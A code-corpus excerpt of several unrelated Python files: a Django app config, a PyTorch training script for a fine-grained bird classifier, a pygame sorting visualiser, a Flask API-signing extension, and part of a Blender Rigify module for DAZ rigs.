content stringlengths 5 1.05M |
|---|
from django.apps import AppConfig
class CoursesappConfig(AppConfig):
name = 'coursesApp'
|
import torch,os
import torch.nn as nn
import torch.optim as optim
import tqdm
from torch.utils.data import DataLoader
from models import lrcm as lrcm
from datahandler import cubdataset as cubdataset
from utils import utils
from loss import custom_loss
import config
random_seed = 524626546435
torch.manual_seed(random_seed)
torch.cuda.manual_seed(random_seed)
def train_model():
"""
train the model.
"""
# region Prepare
# device.
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
train_set = cubdataset.CubDataset(
config.DATA_ROOT,
training = True,
resize = config.RESIZE,
crop = config.CROP,
patch_num = [8,4,2],
)
train_loader = DataLoader(
train_set,
config.TRAIN_BATCH_SIZE,
shuffle = True,
num_workers = config.NUM_WORKERS,
drop_last = True
)
# endregion
# region Model
# model.
bb_name = "densenet161"
model = lrcm.LRCM(
bb_name = bb_name,
backbone_pretrained_path = config.PRETRAINED_MODELS[bb_name],
in_channels_list = [768,2112,2208],
embedding_dim = 768,
rlow_pool_size = [7,7,0],
rmid_pool_size = [7,7,0],
rhig_pool_size = [7,7,0],
vlow_pool_size = [4,4,0],
vmid_pool_size = [4,4,0],
vhig_pool_size = [4,4,1],
low_patch_num = 14 * 14,
mid_patch_num = 7 * 7,
hig_patch_num = 4 * 4,
n_head = 8,
reduced_dim = 768,
atte_hidden_unit = 2048,
dropout = 0.1,
num_class = config.NUM_CLASS,
pretrained_model_path = None,
)
model = model.to(device)
print("============================================================================================================")
print(model)
print("============================================================================================================")
# endregion
# region Optim
# criterion.
cls_cri = nn.CrossEntropyLoss()
fda_cri = custom_loss.FDALoss()
# optimizer.
optimizer = optim.SGD([
{'params': model.r_module.stem.parameters(), 'lr': config.LR * 0.1},
{'params': model.r_module.apdx.parameters(), 'lr': config.LR},
{'params': model.v_module.parameters(), 'lr': config.LR},
{'params': model.c_module.parameters(), 'lr': config.LR}
], momentum = config.MOMENTUM,weight_decay = config.WD)
# endregion
# region Scheduler
# lr
epoch_iters = len(train_loader)
lr_scheduler = optim.lr_scheduler.CosineAnnealingLR(optimizer,T_max = (config.TOTAL_EPOCH - config.WARM_UP_EPOCH) * epoch_iters,eta_min = 0)
wrap_scheduler = utils.WarmupWrapper(optimizer,0,config.WARM_UP_EPOCH * epoch_iters,lr_scheduler)
# endregion
# region Run
global_step = 0
best_fine_epoch = 0
best_valid_fine_acc = 0
best_ens_epoch = 0
best_valid_ens_acc = 0
optimizer.zero_grad()
optimizer.step()
wrap_scheduler.step()
for epoch in range(config.TOTAL_EPOCH):
# statistics
batch_low_cls_loss = 0
batch_mid_cls_loss = 0
batch_hig_cls_loss = 0
batch_coa_cls_loss = 0
batch_com_cls_loss = 0
batch_fda_loss = 0
batch_low_acc = 0
batch_mid_acc = 0
batch_hig_acc = 0
batch_coa_acc = 0
batch_com_acc = 0
epoch_low_acc_num = 0
epoch_mid_acc_num = 0
epoch_hig_acc_num = 0
epoch_coa_acc_num = 0
epoch_com_acc_num = 0
epoch_train_num = 0
model.train()
for data in train_loader:
global_step += 1
# region Forward and Backward
# data
ori_img,low_img,mid_img,hig_img,low_patch_indices,mid_patch_indices,hig_patch_indices,targets = data
low_indices = torch.stack(low_patch_indices,dim = 1).to(device)
mid_indices = torch.stack(mid_patch_indices,dim = 1).to(device)
hig_indices = torch.stack(hig_patch_indices,dim = 1).to(device)
b = targets.size()[0]
# region Coarse
optimizer.zero_grad()
imgs = torch.cat((ori_img,hig_img,mid_img,low_img),dim = 0).to(device)
low_logits,mid_logits,hig_logits,low_fda_output,mid_fda_output,hig_fda_output = model(
imgs,
low_indices,
mid_indices,
hig_indices,
step = "coarse"
)
# cls
low_targets = torch.cat((targets,targets,targets,targets),dim = 0).to(device)
low_loss = cls_cri(low_logits,low_targets)
mid_targets = torch.cat((targets,targets,targets),dim = 0).to(device)
mid_loss = cls_cri(mid_logits,mid_targets)
hig_targets = torch.cat((targets,targets),dim = 0).to(device)
hig_loss = cls_cri(hig_logits,hig_targets)
cls_loss = low_loss + mid_loss + hig_loss
batch_low_cls_loss += low_loss.item()
batch_mid_cls_loss += mid_loss.item()
batch_hig_cls_loss += hig_loss.item()
# fda
lambda_weights = 0.01
fda_loss = lambda_weights * (fda_cri(low_fda_output) + fda_cri(mid_fda_output) + fda_cri(hig_fda_output))
batch_fda_loss += fda_loss.item()
loss = cls_loss + fda_loss
loss.backward()
optimizer.step()
# evaluation
total_logits = torch.cat((low_logits,mid_logits,hig_logits),dim = 0)
total_probs = torch.softmax(total_logits,dim = -1)
total_preds = torch.argmax(total_probs,dim = -1)
low_preds,mid_preds,hig_preds = torch.split(total_preds,[b * 4,b * 3,b * 2],dim = 0)
low_acc_num = torch.sum(low_preds == low_targets).item()
mid_acc_num = torch.sum(mid_preds == mid_targets).item()
hig_acc_num = torch.sum(hig_preds == hig_targets).item()
del imgs,low_img,mid_img,hig_img
# endregion
# region Fine
optimizer.zero_grad()
ori_img = ori_img.to(device)
coa_logits,com_logits = model(
ori_img,
step = "fine"
)
targets = targets.to(device)
coa_loss = cls_cri(coa_logits, targets)
com_loss = cls_cri(com_logits, targets)
batch_coa_cls_loss += coa_loss.item()
batch_com_cls_loss += com_loss.item()
loss = coa_loss + com_loss
loss.backward()
optimizer.step()
wrap_scheduler.step()
coa_probs = torch.softmax(coa_logits,dim = -1)
com_probs = torch.softmax(com_logits,dim = -1)
coa_preds = torch.argmax(coa_probs,dim = -1)
com_preds = torch.argmax(com_probs,dim = -1)
coa_acc_num = torch.sum(coa_preds == targets).item()
com_acc_num = torch.sum(com_preds == targets).item()
# endregion
# endregion
# statistic
batch_low_acc += (low_acc_num / (b * 4))
batch_mid_acc += (mid_acc_num / (b * 3))
batch_hig_acc += (hig_acc_num / (b * 2))
batch_coa_acc += (coa_acc_num / b)
batch_com_acc += (com_acc_num / b)
epoch_low_acc_num += low_acc_num
epoch_mid_acc_num += mid_acc_num
epoch_hig_acc_num += hig_acc_num
epoch_coa_acc_num += coa_acc_num
epoch_com_acc_num += com_acc_num
epoch_train_num += b
# display
if global_step % config.RECORD_FREQ == 0:
avg_low_cls_loss = batch_low_cls_loss / config.RECORD_FREQ
avg_mid_cls_loss = batch_mid_cls_loss / config.RECORD_FREQ
avg_hig_cls_loss = batch_hig_cls_loss / config.RECORD_FREQ
avg_coa_cls_loss = batch_coa_cls_loss / config.RECORD_FREQ
avg_com_cls_loss = batch_com_cls_loss / config.RECORD_FREQ
avg_fda_loss = batch_fda_loss / config.RECORD_FREQ
avg_low_acc = batch_low_acc / config.RECORD_FREQ * 100
avg_mid_acc = batch_mid_acc / config.RECORD_FREQ * 100
avg_hig_acc = batch_hig_acc / config.RECORD_FREQ * 100
avg_coa_acc = batch_coa_acc / config.RECORD_FREQ * 100
avg_com_acc = batch_com_acc / config.RECORD_FREQ * 100
print("E:%d-S:%d-[L:%.4f-M:%.4f-H:%.4f-CO:%.4f-CM:%.4f-F:%.4f]-[L:%.2f%%-M:%.2f%%-H:%.2f%%-CO:%.2f%%-CM:%.2f%%]" %
(
epoch,
global_step,
avg_low_cls_loss,
avg_mid_cls_loss,
avg_hig_cls_loss,
avg_coa_cls_loss,
avg_com_cls_loss,
avg_fda_loss,
avg_low_acc,
avg_mid_acc,
avg_hig_acc,
avg_coa_acc,
avg_com_acc
)
)
with open(config.RECORD_DIR + config.SAVE_MODEL_NAME + "-train.txt","a") as f:
f.write("E:%d-S:%d-[L:%.4f-M:%.4f-H:%.4f-CO:%.4f-CM:%.4f-F:%.4f]-[L:%.2f%%-M:%.2f%%-H:%.2f%%-CO:%.2f%%-CM:%.2f%%]\n" %
(
epoch,
global_step,
avg_low_cls_loss,
avg_mid_cls_loss,
avg_hig_cls_loss,
avg_coa_cls_loss,
avg_com_cls_loss,
avg_fda_loss,
avg_low_acc,
avg_mid_acc,
avg_hig_acc,
avg_coa_acc,
avg_com_acc
)
)
batch_low_cls_loss = 0
batch_mid_cls_loss = 0
batch_hig_cls_loss = 0
batch_coa_cls_loss = 0
batch_com_cls_loss = 0
batch_fda_loss = 0
batch_low_acc = 0
batch_mid_acc = 0
batch_hig_acc = 0
batch_coa_acc = 0
batch_com_acc = 0
# log
low_cls_loss,mid_cls_loss,hig_cls_loss,coa_cls_loss,com_cls_loss,\
low_acc,mid_acc,hig_acc,coa_acc,com_acc,fine_acc,ens_acc = valid_model(
model,device,cls_cri
)
if fine_acc >= best_valid_fine_acc:
best_valid_fine_acc = fine_acc
best_fine_epoch = epoch
saved_path = os.path.join(config.CHECKPOINT_SAVED_FOLDER,config.SAVE_MODEL_NAME+"-fine.pth")
torch.save(model.state_dict(),saved_path,_use_new_zipfile_serialization = False)
if ens_acc >= best_valid_ens_acc:
best_valid_ens_acc = ens_acc
best_ens_epoch = epoch
saved_path = os.path.join(config.CHECKPOINT_SAVED_FOLDER,config.SAVE_MODEL_NAME+"-ens.pth")
torch.save(model.state_dict(),saved_path,_use_new_zipfile_serialization = False)
print("-" * 80)
print("E:%d-S:%d-[L:%.4f-M:%.4f-H:%.4f-CO:%.4f-CM:%.4f]-[(Va)L:%.2f%%-M:%.2f%%-H:%.2f%%-CO:%.2f%%-CM:%.2f%%-ENS:%.2f%%]-[(Ta)L:%.2f%%-M:%.2f%%-H:%.2f%%-CO:%.2f%%-CM:%.2f%%]-[E:%d-Fine:%.2f%%]-[E:%d-ENS:%.2f%%]" %
(
epoch,
global_step,
low_cls_loss,
mid_cls_loss,
hig_cls_loss,
coa_cls_loss,
com_cls_loss,
low_acc,
mid_acc,
hig_acc,
coa_acc,
com_acc,
ens_acc,
epoch_low_acc_num / (epoch_train_num * 4) * 100,
epoch_mid_acc_num / (epoch_train_num * 3) * 100,
epoch_hig_acc_num / (epoch_train_num * 2) * 100,
epoch_coa_acc_num / epoch_train_num * 100,
epoch_com_acc_num / epoch_train_num * 100,
best_fine_epoch,
best_valid_fine_acc,
best_ens_epoch,
best_valid_ens_acc,
)
)
print("-" * 80)
with open(config.RECORD_DIR + config.SAVE_MODEL_NAME + "-test.txt","a") as f:
f.write("E:%d-S:%d-[L:%.4f-M:%.4f-H:%.4f-CO:%.4f-CM:%.4f]-[(Va)L:%.2f%%-M:%.2f%%-H:%.2f%%-CO:%.2f%%-CM:%.2f%%-ENS:%.2f%%]-[(Ta)L:%.2f%%-M:%.2f%%-H:%.2f%%-CO:%.2f%%-CM:%.2f%%]-[E:%d-Fine:%.2f%%]-[E:%d-ENS:%.2f%%]\n" %
(
epoch,
global_step,
low_cls_loss,
mid_cls_loss,
hig_cls_loss,
coa_cls_loss,
com_cls_loss,
low_acc,
mid_acc,
hig_acc,
coa_acc,
com_acc,
ens_acc,
epoch_low_acc_num / (epoch_train_num * 4) * 100,
epoch_mid_acc_num / (epoch_train_num * 3) * 100,
epoch_hig_acc_num / (epoch_train_num * 2) * 100,
epoch_coa_acc_num / epoch_train_num * 100,
epoch_com_acc_num / epoch_train_num * 100,
best_fine_epoch,
best_valid_fine_acc,
best_ens_epoch,
best_valid_ens_acc,
)
)
# endregion
def valid_model(model,device,cls_cri):
"""
valid or test the model.
"""
# test datasets
test_set = cubdataset.CubDataset(config.DATA_ROOT,training = False,resize = config.RESIZE,crop = config.CROP)
test_loader = DataLoader(test_set,1,shuffle = False,num_workers = 1)
# valid run.
low_cls_loss = 0
mid_cls_loss = 0
hig_cls_loss = 0
coa_cls_loss = 0
com_cls_loss = 0
low_acc = 0
mid_acc = 0
hig_acc = 0
coa_acc = 0
com_acc = 0
fine_acc = 0
ens_acc = 0
total_num = len(test_loader)
# change to eval mode.
model.eval()
with torch.no_grad():
for data in tqdm.tqdm(test_loader,desc = "valid"):
# data
imgs,targets = data
imgs = imgs.to(device)
targets = targets.to(device)
# forward
low_logits,mid_logits,hig_logits,coa_logits,com_logits = model(imgs)
low_loss,mid_loss,hig_loss,coa_loss,com_loss = \
cls_cri(low_logits,targets),cls_cri(mid_logits,targets),\
cls_cri(hig_logits,targets),cls_cri(coa_logits,targets),cls_cri(com_logits,targets)
low_cls_loss += low_loss.item()
mid_cls_loss += mid_loss.item()
hig_cls_loss += hig_loss.item()
coa_cls_loss += coa_loss.item()
com_cls_loss += com_loss.item()
# evaluation.
b = targets.size()[0]
fine_logits = coa_logits + com_logits
ens_logits = low_logits + mid_logits + hig_logits + coa_logits + com_logits
total_logits = torch.cat((low_logits,mid_logits,hig_logits,coa_logits,com_logits,fine_logits,ens_logits),dim = 0)
total_probs = torch.softmax(total_logits,dim = -1)
total_preds = torch.argmax(total_probs,dim = -1)
low_preds,mid_preds,hig_preds,coa_preds,com_preds,fine_preds,ens_preds = torch.split(total_preds,[b,b,b,b,b,b,b],dim = 0)
low_acc += torch.sum(low_preds == targets).item()
mid_acc += torch.sum(mid_preds == targets).item()
hig_acc += torch.sum(hig_preds == targets).item()
coa_acc += torch.sum(coa_preds == targets).item()
com_acc += torch.sum(com_preds == targets).item()
fine_acc += torch.sum(fine_preds == targets).item()
ens_acc += torch.sum(ens_preds == targets).item()
return low_cls_loss/total_num,mid_cls_loss/total_num,hig_cls_loss/total_num,\
coa_cls_loss/total_num,com_cls_loss/total_num,\
low_acc/total_num * 100,mid_acc/total_num * 100,hig_acc/total_num * 100,\
coa_acc/total_num * 100,com_acc/total_num * 100,fine_acc/total_num * 100,ens_acc/total_num * 100
if __name__ == "__main__":
# training
train_model() |
import pygame
import time
pygame.font.init()
def outer(numbers,a):
pygame.font.init()
#color init
black=(0,0,0)
white=(255,255,255)
dark_grey=(77,77,77)
grey=(102,102,102)
red=(255,0,0)
lime=(51,255,51)
light_green=(200,255,200)
light_grey=(128,128,128)
back=(199,209,199)
#variable initialization
display_height=750
display_width=1000
#display init
screen = pygame.display.set_mode((display_width,display_height))
pygame.display.set_caption('Sorting Algorithm')
clock=pygame.time.Clock()
def text_objects(text,font):
textSurface = font.render(text, True, dark_grey)
return textSurface, textSurface.get_rect()
def bars(array,change):
n=len(array)
big=max(array)
small=min(array)
r=big
shift=0
if small<0:
r=abs(small)+big
arry=[]
if n<20:
a=1
message_font=pygame.font.SysFont('arial.ttf',40)
elif 19<n<50:
a=2
message_font=pygame.font.SysFont('arial.ttf',20)
else:
a=3
message_font=pygame.font.SysFont('arial.ttf',15)
try:
ratio=(display_height-50)/r
except ZeroDivisionError:
ratio = 1
if n>6:
w=(display_width/(n+(n+1)*0.2))
w_gap=(w*0.2)
else:
w=100
w_gap=60
for i in array:
arry.append(i*ratio)
if small<0:
ss=min(arry)
shift=shift-ss+20
for x in range(n):
if x in change:
pygame.draw.rect(screen,lime,[(w_gap*(x+1))+w*x,display_height-arry[x]-shift,w,arry[x]])
else:
pygame.draw.rect(screen,light_green,[(w_gap*(x+1))+w*x,display_height-arry[x]-shift,w,arry[x]])
TextSurf , TextRect = text_objects(str(array[x]),message_font)
if arry[x]>=0:
TextRect.center=(((w_gap*(x+1))+w*x+w/2),(display_height-arry[x]-shift-20/a))
if arry[x]<0:
TextRect.center=(((w_gap*(x+1))+w*x+w/2),(display_height-(20/a)-shift))
screen.blit(TextSurf,TextRect)
pygame.display.update()
return
def display_loop():
'''The loop governs the repeated dispaly of updates in frames'''
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
quit()
screen.fill(back)
bars(numbers,a)
pygame.display.update()
clock.tick(60)
time.sleep(0.1)
return
display_loop()
def exit():
x=0
for event in pygame.event.get():
if event.type==pygame.QUIT:
pygame.quit()
x+=1
if x>1000:
break
time.sleep(1)
pygame.quit()
|
# -*- coding: utf-8 -*-
# @author: juforg
# @email: juforg@sina.com
# @date: 2020/04/06
# SJ编程规范
# 命名:
# 1. 见名思意,变量的名字必须准确反映它的含义和内容
# 2. 遵循当前语言的变量命名规则
# 3. 不要对不同使用目的的变量使用同一个变量名
# 4. 同个项目不要使用不同名称表述同个东西
# 5. 函数/方法 使用动词+名词组合,其它使用名词组合
# 设计原则:
# 1. KISS原则: Keep it simple and stupid !
# 2. SOLID原则: S: 单一职责 O: 开闭原则 L: 迪米特法则 I: 接口隔离原则 D: 依赖倒置原则
#
from flask import jsonify
from flask_api_sign.config import config
from flask_api_sign.exceptions import SignException, RequestExpiredError, NotConfigedAppIdsError, InvalidAppIdsTypeError, NotAllowedAppIdError, UnknowAppIdError
class ApiSignManager(object):
def __init__(self, app=None):
"""
Create the ApiSignManager instance. You can either pass a flask application
in directly here to register this extension with the flask app, or
call init_app after creating this object (in a factory pattern).
:param app: A flask application
"""
# Register the default error handler callback methods. These can be
# overridden with the appropriate loader decorators
# Register this extension with the flask app now (if it is provided)
if app is not None:
self.init_app(app)
def init_app(self, app):
"""
Register this extension with the flask app.
:param app: A flask application
"""
# Save this so we can use it later in the extension
if not hasattr(app, 'extensions'): # pragma: no cover
app.extensions = {}
app.extensions['flask-api-sign'] = self
# Set all the default configurations for this extension
self._set_default_configuration_options(app)
self._set_error_handler_callbacks(app)
@staticmethod
def _set_error_handler_callbacks(app):
"""
Sets the error handler callbacks used by this extension
"""
@app.errorhandler(RequestExpiredError)
def handle_error(e):
return jsonify({config.error_msg_key: f'request timestamp expired:{e.args}'}), 408
@app.errorhandler(SignException)
def handle_error(e):
return jsonify({config.error_msg_key: f'verification failed :{e.args}'}), 401
@staticmethod
def _set_default_configuration_options(app):
"""
Sets the default configuration options used by this extension
"""
# Where to look for the SIGN param.
app.config.setdefault('SIGN_LOCATION', 'query_string')
app.config.setdefault('SIGN_TIMESTAMP_NAME', 'timestamp')
app.config.setdefault('SIGN_APP_ID_NAME', 'x-app-id')
app.config.setdefault('SIGN_SIGNATURE_NAME', 'x-sign')
app.config.setdefault('SIGN_REQUEST_ID_NAME', 'x-request-id')
app.config.setdefault('SIGN_ACCESS_TOKEN_NAME', 'x-access-token')
app.config.setdefault('SIGN_APP_SECRET_NAME', 'app-secret')
# How long an a sign is valid.
app.config.setdefault('SIGN_TIMESTAMP_EXPIRATION', 30)
# What algorithm to use to sign . RSA SHA md5
app.config.setdefault('SIGN_ALGORITHM', 'HS256')
# Options for blacklisting/revoking tokens
app.config.setdefault('SIGN_BLACKLIST_ENABLED', False)
app.config.setdefault('SIGN_REQUIRE_SIGN', True)
app.config.setdefault('SIGN_REQUIRE_TOKEN', False)
app.config.setdefault('SIGN_ERROR_MSG_KEY', 'msg')
@staticmethod
def get_and_check_app_secret(app_id):
"""
根据 app_id获取对应的 secret
:param app_id:
:return:
"""
if not config.cust_check_app_id_func:
if not config.app_ids:
raise NotConfigedAppIdsError("appid list not configed")
if not isinstance(config.app_ids, dict):
raise InvalidAppIdsTypeError("appid list not a dict")
app_secret = config.app_ids.get(app_id)
if not app_secret:
raise UnknowAppIdError(f"unknow app_id:{app_id}")
else:
return app_secret
else:
return config.cust_check_app_id_func(app_id)
class ApiSign(object):
app_id = None
request_id = None
signature = None
timestamp = None
other_params = dict()
def __init__(self, app_id=None, request_id=None, signature=None, timestamp=None, other_params=None):
self.app_id = app_id
self.request_id = request_id
self.signature = signature
self.timestamp = timestamp
self.other_params = other_params
def dict(self):
d = {config.app_id: self.app_id,
config.request_id: self.request_id,
# config.data_key: self.other_params,
config.timestamp: self.timestamp,
}
if self.other_params:
d[config.data_key] = self.other_params
return d
|
# Copyright (c) 2016-2020, Thomas Larsson
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are those
# of the authors and should not be interpreted as representing official policies,
# either expressed or implied, of the FreeBSD Project.
"""
Abstract
Postprocessing of rigify rig
"""
import bpy
import os
from collections import OrderedDict
from bpy.props import *
from mathutils import Vector
from .error import *
from .utils import *
from .fix import Fixer, BendTwists
R_FACE = 1
R_DEFORM = 29
R_HELP = 30
def setupTables(meta):
global MetaBones, MetaParents, MetaDisconnect, RigifyParams
global RigifySkeleton, GenesisCarpals, GenesisSpine
global Genesis3Spine, Genesis3Mergers, Genesis3Parents
global Genesis3Toes, Genesis3Renames
global DeformBones
if meta.DazPre278:
hips = "hips"
spine = "spine"
spine1 = "spine-1"
chest = "chest"
chest1 = "chest-1"
neck = "neck"
head = "head"
rigtype = "rigify"
MetaBones = {
"spine" : spine,
"spine-1" : spine1,
"chest" : chest,
"chest-1" : chest1,
"chestUpper" : chest1,
"neck" : neck,
"head" : head,
}
RigifyParams = {}
DeformBones = {
"neckLower" : "DEF-neck",
"neckUpper" : "DEF-neck",
"ShldrBend" : "DEF-upper_arm.01.%s",
"ForearmBend" : "DEF-forearm.01.%s",
"ThighBend" : "DEF-thigh.01.%s",
"ShldrTwist" : "DEF-upper_arm.02.%s",
"ForearmTwist" : "DEF-forearm.02.%s",
"ThighTwist" : "DEF-thigh.02.%s",
"Shin" : "DEF-shin.02.%s",
}
else:
hips = "spine"
spine = "spine.001"
spine1 = "spine.002"
chest = "spine.003"
chest1 = "spine.004"
neck = "spine.005"
if meta.DazUseSplitNeck:
neck1= "spine.006"
head = "spine.007"
else:
head = "spine.006"
rigtype = "rigify2"
bpy.ops.object.mode_set(mode='EDIT')
eb = meta.data.edit_bones[head]
deleteChildren(eb, meta)
bpy.ops.object.mode_set(mode='OBJECT')
MetaBones = {
"spine" : hips,
"spine-1" : spine1,
"chest" : chest,
"chest-1" : chest1,
"chestUpper" : chest1,
"neck" : neck,
"head" : head,
}
RigifyParams = {
("spine", "neck_pos", 6),
("spine", "pivot_pos", 1),
}
DeformBones = {
"neckLower" : "DEF-spine.005",
"neckUpper" : "DEF-spine.006",
"ShldrBend" : "DEF-upper_arm.%s",
"ForearmBend" : "DEF-forearm.%s",
"ThighBend" : "DEF-thigh.%s",
"ShldrTwist" : "DEF-upper_arm.%s.001",
"ForearmTwist" : "DEF-forearm.%s.001",
"ThighTwist" : "DEF-thigh.%s.001",
"Shin" : "DEF-shin.%s.001",
}
MetaDisconnect = [hips, neck]
MetaParents = {
"breast.L" : chest,
"breast.R" : chest,
"shoulder.L" : chest1,
"shoulder.R" : chest1,
}
RigifySkeleton = {
hips : ("hip", ["hip", "pelvis"]),
"thigh.L" : "lThigh",
"shin.L" : "lShin",
"foot.L" : "lFoot",
"toe.L" : "lToe",
"thigh.R" : "rThigh",
"shin.R" : "rShin",
"foot.R" : "rFoot",
"toe.R" : "rToe",
"abdomen" : "abdomen",
"chest" : "chest",
"neck" : "neck",
"head" : "head",
"shoulder.L" : "lCollar",
"upper_arm.L" : "lShldr",
"forearm.L" : "lForeArm",
"hand.L" : "lHand",
"shoulder.R" : "rCollar",
"upper_arm.R" : "rShldr",
"forearm.R" : "rForeArm",
"hand.R" : "rHand",
"thumb.01.L" : "lThumb1",
"thumb.02.L" : "lThumb2",
"thumb.03.L" : "lThumb3",
"f_index.01.L" : "lIndex1",
"f_index.02.L" : "lIndex2",
"f_index.03.L" : "lIndex3",
"f_middle.01.L" : "lMid1",
"f_middle.02.L" : "lMid2",
"f_middle.03.L" : "lMid3",
"f_ring.01.L" : "lRing1",
"f_ring.02.L" : "lRing2",
"f_ring.03.L" : "lRing3",
"f_pinky.01.L" : "lPinky1",
"f_pinky.02.L" : "lPinky2",
"f_pinky.03.L" : "lPinky3",
"thumb.01.R" : "rThumb1",
"thumb.02.R" : "rThumb2",
"thumb.03.R" : "rThumb3",
"f_index.01.R" : "rIndex1",
"f_index.02.R" : "rIndex2",
"f_index.03.R" : "rIndex3",
"f_middle.01.R" : "rMid1",
"f_middle.02.R" : "rMid2",
"f_middle.03.R" : "rMid3",
"f_ring.01.R" : "rRing1",
"f_ring.02.R" : "rRing2",
"f_ring.03.R" : "rRing3",
"f_pinky.01.R" : "rPinky1",
"f_pinky.02.R" : "rPinky2",
"f_pinky.03.R" : "rPinky3",
"palm.01.L" : "lCarpal1",
"palm.02.L" : "lCarpal2",
"palm.03.L" : "lCarpal3",
"palm.04.L" : "lCarpal4",
"palm.01.R" : "rCarpal1",
"palm.02.R" : "rCarpal2",
"palm.03.R" : "rCarpal3",
"palm.04.R" : "rCarpal4",
}
BreastBones = {
"breast.L" : "lPectoral",
"breast.R" : "rPectoral",
#"breastDrv.L" : "lPectoralDrv",
#"breastDrv.R" : "rPectoralDrv",
}
if meta.DazUseBreasts:
RigifySkeleton = addDicts([RigifySkeleton, BreastBones])
GenesisCarpals = {
"palm.01.L" : (("lCarpal1", "lIndex1"), ["lCarpal1"]),
"palm.02.L" : (("lCarpal1", "lMid1"), []),
"palm.03.L" : (("lCarpal2", "lRing1"), ["lCarpal2"]),
"palm.04.L" : (("lCarpal2", "lPinky1"), []),
"palm.01.R" : (("rCarpal1", "rIndex1"), ["rCarpal1"]),
"palm.02.R" : (("rCarpal1", "rMid1"), []),
"palm.03.R" : (("rCarpal2", "rRing1"), ["rCarpal2"]),
"palm.04.R" : (("rCarpal2", "rPinky1"), []),
}
GenesisSpine = [
("abdomen", spine, hips),
("abdomen2", spine1, spine),
("chest", chest, spine1),
("neck", neck, chest),
("head", head, neck),
]
Genesis3Spine = [
("abdomen", spine, hips),
("abdomen2", spine1, spine),
("chest", chest, spine1),
("chestUpper", chest1, chest),
("neck", neck, chest1),
]
if meta.DazUseSplitNeck:
Genesis3Spine += [
("neckUpper", neck1, neck),
("head", head, neck1)]
else:
Genesis3Spine.append(("head", head, neck))
Genesis3Mergers = {
"lShldrBend" : ["lShldrTwist"],
"lForearmBend" : ["lForearmTwist"],
"lThighBend" : ["lThighTwist"],
"lFoot" : ["lMetatarsals"],
"rShldrBend" : ["rShldrTwist"],
"rForearmBend" : ["rForearmTwist"],
"rThighBend" : ["rThighTwist"],
"rFoot" : ["rMetatarsals"],
}
if not meta.DazUseSplitNeck:
Genesis3Mergers["neckLower"] = ["neckUpper"]
Genesis3Parents = {
"neckLower" : "chestUpper",
"chestUpper" : "chestLower",
"chestLower" : "abdomenUpper",
"abdomenUpper" : "abdomenLower",
"lForearmBend" : "lShldrBend",
"lHand" : "lForearmBend",
"lShin" : "lThighBend",
"lToe" : "lFoot",
"rForearmBend" : "rShldrBend",
"rHand" : "rForearmBend",
"rShin" : "rThighBend",
"rToe" : "rFoot",
}
if meta.DazUseSplitNeck:
Genesis3Parents["head"] = "neckUpper"
Genesis3Parents["neckUpper"] = "neckLower"
else:
Genesis3Parents["head"] = "neckLower"
Genesis3Toes = {
"lBigToe" : "lToe",
"lSmallToe1" : "lToe",
"lSmallToe2" : "lToe",
"lSmallToe3" : "lToe",
"lSmallToe4" : "lToe",
"rBigToe" : "rToe",
"rSmallToe1" : "rToe",
"rSmallToe2" : "rToe",
"rSmallToe3" : "rToe",
"rSmallToe4" : "rToe",
}
Genesis3Renames = {
"abdomenLower" : "abdomen",
"abdomenUpper" : "abdomen2",
"chestLower" : "chest",
"neckLower" : "neck",
"lShldrBend" : "lShldr",
"lForearmBend" : "lForeArm",
"lThighBend" : "lThigh",
"rShldrBend" : "rShldr",
"rForearmBend" : "rForeArm",
"rThighBend" : "rThigh",
}
return rigtype, hips, head
def deleteChildren(eb, meta):
for child in eb.children:
deleteChildren(child, meta)
meta.data.edit_bones.remove(child)
class DazBone:
def __init__(self, eb):
from .fix import ConstraintStore
self.name = eb.name
self.head = eb.head.copy()
self.tail = eb.tail.copy()
self.roll = eb.roll
if eb.parent:
self.parent = eb.parent.name
else:
self.parent = None
self.use_deform = eb.use_deform
self.rotation_mode = None
self.store = ConstraintStore()
def getPose(self, pb):
self.rotation_mode = pb.rotation_mode
self.lock_location = pb.lock_location
self.lock_rotation = pb.lock_rotation
self.lock_scale = pb.lock_scale
self.store.storeConstraints(pb.name, pb)
def setPose(self, pb):
pb.rotation_mode = self.rotation_mode
pb.lock_location = self.lock_location
pb.lock_rotation = self.lock_rotation
pb.lock_scale = self.lock_scale
self.store.restoreConstraints(pb.name, pb)
def addDicts(structs):
joined = {}
for struct in structs:
for key,value in struct.items():
joined[key] = value
return joined
class Rigify:
def setupDazSkeleton(self, meta):
rigifySkel = RigifySkeleton
if meta.DazRigifyType in ["genesis1", "genesis2"]:
rigifySkel["chestUpper"] = "chestUpper"
rigifySkel["abdomen2"] = "abdomen2"
spineBones = Genesis3Spine
elif meta.DazRigifyType in ["genesis3", "genesis8"]:
spineBones = Genesis3Spine
dazskel = {}
for rbone, dbone in rigifySkel.items():
if isinstance(dbone, tuple):
dbone = dbone[0]
if isinstance(dbone, str):
dazskel[dbone] = rbone
return rigifySkel, spineBones, dazskel
def renameBones(self, rig, bones):
bpy.ops.object.mode_set(mode='EDIT')
for dname,rname in bones.items():
if dname in rig.data.edit_bones.keys():
eb = rig.data.edit_bones[dname]
